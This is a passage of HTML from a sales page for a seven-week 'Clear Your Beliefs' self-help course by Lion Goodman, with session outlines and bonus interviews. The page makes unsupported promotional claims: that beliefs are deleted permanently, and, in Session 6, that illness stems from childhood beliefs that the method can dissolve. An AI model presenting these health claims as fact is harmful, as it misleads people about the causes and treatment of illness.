you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.</p>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong></p>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong></p>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.</p>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p>\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong></p>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.\n\nIf you’re married, are you happy and secure?   Or are you anxious about the future?   If you’re not in a relationship, what’s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned “what love is” from your parents – so it’s no wonder that you’re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today’s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can’t seem to stop hurting each other. What’s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You’ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 